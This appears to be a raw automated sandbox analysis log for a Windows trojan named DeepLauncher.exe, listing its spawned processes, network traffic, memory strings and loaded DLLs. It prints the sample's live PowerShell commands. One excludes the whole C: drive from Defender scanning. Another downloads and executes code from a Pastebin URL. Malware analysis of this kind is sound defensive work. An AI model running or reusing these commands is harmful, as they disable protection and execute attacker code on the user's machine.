Source: powershell.exe, 00000004.00000002.1519392910.0000017EBEC63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1485723590.00000220C1B73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1585638365.0000024112EA7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1585638365.0000024112D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1817076970.00000174BB37F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.1386081536.0000024103922000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 00000008.00000002.1386081536.0000024102CF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1386081536.0000024102F22000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/WHKzW2nr
Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49892 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAB45EB7D NtWriteVirtualMemory,8_2_00007FFAAB45EB7D
Source: DeepLauncher.exeStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Source: DeepLauncher.exe, 00000000.00000002.2566427663.00000233C5580000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2569211926.00000233C6EF0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562350709.000001F32EEB1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.Primitives.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2563165264.000001F330741000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562497945.000001F32EEF0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2568455253.00000233C6962000.00000020.00000001.00040000.00000003.sdmpBinary or memory string: OriginalFilenameDeepLauncher.dll: vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566297559.00000233C5531000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2563012536.000001F330710000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562423615.000001F32EED1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566107474.00000233C5430000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.Common.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562816385.000001F3306E0000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.Primitives.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566798798.00000233C5A10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Net.ServicePoint.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562578727.000001F32EF01000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2570342977.00000233C75A1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562970930.000001F330701000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566056535.00000233C5420000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566373042.00000233C5571000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.EventBasedAsync.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566972555.00000233C5B11000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Private.CoreLib.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2563393856.000001F330790000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.TraceSource.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566027392.00000233C5400000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Principal.Windows.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562892333.000001F3306F1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Collections.Specialized.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562792361.000001F3306D1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.Primitives.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2563277960.000001F330771000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.TraceSource.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2563203699.000001F330760000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Threading.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2562624925.000001F32EF10000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.ComponentModel.Primitives.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000000.1305223115.00007FF6E6CC8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamemscordaccore.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000000.1305223115.00007FF6E6CC8000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDeepLauncher.dll: vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2565964975.00000233C53F1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Security.Claims.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2563088639.000001F330730000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.InteropServices.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2566221492.00000233C54B1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.Common.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exe, 00000000.00000002.2563468243.000001F3307A1000.00000020.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Runtime.Serialization.Primitives.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exeBinary or memory string: OriginalFilenamemscordaccore.dll@ vs DeepLauncher.exe
Source: DeepLauncher.exeBinary or memory string: OriginalFilenameDeepLauncher.dll: vs DeepLauncher.exe
Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@17/23@5/5
Source: C:\Users\user\Desktop\DeepLauncher.exeFile created: C:\Users\user\AppData\Roaming\notification_sent.flagJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7328:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7452:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8080:120:WilError_03
Source: C:\Users\user\Desktop\DeepLauncher.exeFile created: C:\Users\user\AppData\Local\Temp\djqvlzhk.zazJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: DeepLauncher.exeVirustotal: Detection: 15%
Source: DeepLauncher.exeReversingLabs: Detection: 24%
Source: DeepLauncher.exeString found in binary or memory: overflow:hidden;img src="http://addEventListenerresponsible for s.js"></script>
Source: DeepLauncher.exeString found in binary or memory: Morph - Structs/AddrExp
Source: DeepLauncher.exeString found in binary or memory: @0x%x with loopPre-importprejittail.call and not BBINSTRExpand patchpointsPost-importImportationIndirect call transformProfile incorporationMorph - InitProfile instrumentation prepProfile instrumentationAllocate ObjectsRemove empty tryMorph - InliningMorph - Add internal blocksClone finallyUpdate finally target flagsRemove empty finallyMerge callfinally chainsEarly livenessPhysical promotionUpdate flow graph early passMorph - Structs/AddrExpMorph - ByRefsMorph - Promote StructsForward SubstitutionIdentify candidates for implicit byref copy omissionGS CookieCompute edge weights (1, false)Morph - GlobalMorph - FinishMerge throw blocksInvert loopsCreate EH funcletsTail mergeOptimize layoutCompute blocks reachabilityPost-morph tail mergeOptimize control flowFind loopsClone loopsSet block weightsRedundant zero InitsMorph array opsHoist loop codeUnroll loopsClear loop infoFind oper orderSet block orderMark local varsOptimize boolsSSA: Doms1SSA: livenessBuild SSA representationSSA: topological sortSSA: renameEarly Value PropagationSSA: DFSSA: insert phisOptimize Valnum CSEsVN based copy propDo value numberingOptimize index checksAssertion propIf conversionVN based intrinsic expansionRedundant branch optsCompute edge weights (2, false)Stress gtSplitTreeVN-based dead store removalUpdate flow graph opt passExpand TLS accessInsert GC PollsExpand runtime lookupsExpand static initDo 'simple' loweringLocal var livenessDetermine first cold blockRationalize IRGlobal local var livenessLowering decompositionLocal var liveness initPer block local var livenessLinear scan register allocLSRA build intervalsLowering nodeinfoCalculate stack level slotsPlace 'align' instructionsGenerate codeLSRA allocateLSRA resolvePost-EmitEmit codeEmit GC+EH tablesProcessor does not have a high-frequency timer.
Source: DeepLauncher.exeString found in binary or memory: GC initialization failed with error 0x%08XVirtualAlloc2kernelbase.dllMapViewOfFile3bad array new lengthstring too longUsing internal fxrApplication root path is empty. This shouldn't happenUsing internal hostpolicy--depsfilePath containing probing policy and assemblies to probe for.<path>--additionalprobingpath--fx-versionPath to <application>.runtimeconfig.json file.--runtimeconfigPath to <application>.deps.json file.<value>--roll-forwardVersion of the installed Shared Framework to use to run the application.<version>--roll-forward-on-no-candidate-fxPath to additional deps.json file.--additional-depsRoll forward to framework version (LatestPatch, Minor, LatestMinor, Major, LatestMajor, Disable)Parsed known arg %s = %ssdk<obsolete><n>Application '%s' is not a managed executable.Using the provided arguments to determine the application to execute. %s %-*s %sFailed to parse supported options or their values:--- Executing in split/FX mode...The application to execute does not exist: '%s'dotnet exec needs a managed .dll or .exe extension. The application specified was '%s'Application '%s' does not exist.staticexec--- Executing in muxer mode...--- Executing in a native executable mode...
Source: DeepLauncher.exeString found in binary or memory: %s --list-runtimes Display the installed runtimeshost-options: The path to an application .dll file to execute.path-to-application: --info Display .NET information. -h|--help Displays this help.Common Options: --list-sdks Display the installed SDKsinvalid hash bucket countunordered_map/set too longinvalid string positionvector too longInvalid startup info: host_path, dotnet_root, and app_path should not be null.A fatal error occurred while processing application bundlehostfxr_main_bundle_startupinfo--- Invoked %s [version: %s]hostfxr_main_startupinfoget-native-search-directories--list-runtimes--list-sdksUsing dotnet root path [%s]/?-?--help-hdotnet.dll The command could not be loaded, possibly because:
Source: DeepLauncher.exeString found in binary or memory: %s --list-runtimes Display the installed runtimeshost-options: The path to an application .dll file to execute.path-to-application: --info Display .NET information. -h|--help Displays this help.Common Options: --list-sdks Display the installed SDKsinvalid hash bucket countunordered_map/set too longinvalid string positionvector too longInvalid startup info: host_path, dotnet_root, and app_path should not be null.A fatal error occurred while processing application bundlehostfxr_main_bundle_startupinfo--- Invoked %s [version: %s]hostfxr_main_startupinfoget-native-search-directories--list-runtimes--list-sdksUsing dotnet root path [%s]/?-?--help-hdotnet.dll The command could not be loaded, possibly because:
Source: DeepLauncher.exeString found in binary or memory: https://aka.ms/dotnet/app-launch-failed
Source: unknownProcess created: C:\Users\user\Desktop\DeepLauncher.exe "C:\Users\user\Desktop\DeepLauncher.exe"
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES27FB.tmp" "c:\Users\user\AppData\Local\Temp\ued2riov\CSCAE107C6CD7AF4B418D296C50EC1D4A12.TMP"
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"Jump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ued2riov\ued2riov.cmdline"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES27FB.tmp" "c:\Users\user\AppData\Local\Temp\ued2riov\CSCAE107C6CD7AF4B418D296C50EC1D4A12.TMP"Jump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: icu.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: secur32.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: wshunix.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: devobj.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: amsi.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: schannel.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\DeepLauncher.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
